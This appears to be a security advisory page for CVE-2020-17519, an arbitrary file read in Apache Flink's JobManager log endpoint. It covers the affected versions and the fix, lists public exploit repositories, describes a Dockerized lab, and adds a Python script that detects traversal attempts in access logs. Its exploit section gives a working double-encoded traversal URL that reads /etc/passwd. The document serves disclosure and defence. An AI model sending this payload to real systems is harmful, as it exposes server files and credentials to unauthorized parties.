HIGH
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.
Weakness: Files or Directories Accessible to External Parties
The product makes files or directories accessible to unauthorized actors, even though they should not be.
Published: 2021-01-05
Community Advisory
This section is open source and collects any additional information that enhances or clarifies the official advisory above.
CVE-2020-17519 Exploits (11)
- B1anda0/CVE-2020-17519 (34)
- dolevf/apache-flink-directory-traversal.nse (3)
- murataydemir/CVE-2020-17519 (2)
- yaunsky/CVE-2020-17519-Apache-Flink (1)
- QmF0c3UK/CVE-2020-17519 (1)
- hoanx4/CVE-2020-17519
- Osyanina/westone-CVE-2020-17519-scanner
- projectdiscovery/nuclei-templates/cves/CVE-2020-17519.yaml
- radbsie/CVE-2020-17519-Exp
- jaeles-project/jaeles-signatures/cves/apache-flink-lfi-cve-2020-17519.yaml
CVE-2020-17519 Vulnerable Docker Environment
Vulhub is an open-source collection of Dockerized vulnerable environments. No prior knowledge of Docker is required: run two simple commands and you have a vulnerable environment.
Apache Flink jobmanager/logs
Path Traversal (CVE-2020-17519)
Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
References:
- https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
Environment Setup
Execute the following command to start an Apache Flink JobManager 1.11.2:
docker-compose up -d
After Apache Flink has started, visit http://your-ip:8081 to view the homepage.
Exploit
Disclose /etc/passwd:
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
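The request above works because the log route resolves a double-encoded path (`%252f` decodes to `%2f`, then to `/`). The following is an added detection example, not code from the advisory, the Flink project or the vulhub environment: it normalizes request paths by decoding until stable and flags any request to `/jobmanager/logs/` that resolves outside that directory, run over constructed combined-log lines of the kind a reverse proxy in front of the JobManager would write (the log format and the sample lines are assumptions).

```python
import posixpath
import re
from urllib.parse import unquote

# Route affected by CVE-2020-17519; the file name is the remainder of the path.
LOG_ROUTE = "/jobmanager/logs/"
# Combined-log style line from a reverse proxy in front of the JobManager (assumed format).
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) HTTP/[\d.]+"')

def normalize_path(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (the page's payload is double-encoded:
    %252f -> %2f -> /), drop any query string, then collapse . and .. segments."""
    path = raw.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return posixpath.normpath(path)

def is_log_traversal(raw_path: str) -> bool:
    """True when a request to the log route resolves outside the logs directory."""
    if not raw_path.startswith(LOG_ROUTE):
        return False
    normalized = normalize_path(raw_path)
    # The directory itself (normpath strips the trailing slash) is not an escape.
    return normalized != LOG_ROUTE.rstrip("/") and not normalized.startswith(LOG_ROUTE)

def find_traversal_attempts(log_text: str) -> list:
    """Return (client, raw_path) pairs whose log-route request escapes the directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if m and is_log_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample: one benign log read, the page's double-encoded payload,
# a single-encoded variant, and an unrelated request.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [05/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/flink--standalonesession-0.log HTTP/1.1" 200 5120
10.0.0.9 - - [05/Jan/2021:10:00:07 +0000] "GET /jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1426
10.0.0.9 - - [05/Jan/2021:10:00:09 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fhostname HTTP/1.1" 200 13
10.0.0.7 - - [05/Jan/2021:10:00:12 +0000] "GET /overview HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for client, path in find_traversal_attempts(SAMPLE_ACCESS_LOG):
        print(f"traversal attempt from {client}: {path} -> {normalize_path(path)}")
```

A 200 response on a flagged request is the strongest signal, since the fixed versions reject escaped paths; the check itself is independent of the status code.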
Official CVE References
- packetstormsecurity.com/files/160849/Apache-Flink-1.11.0-Arbitrary-File-Read-Directory-Traversal.html
- openwall.com/lists/oss-security/2021/01/05/2
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E
- apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cuser.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cissues.flink.apache.org%3E
- apache.org/thread.html/[email protected]%3Cannounce.apache.org%3E
- apache.org/thread.html/[email protected]%3Cdev.flink.apache.org%3E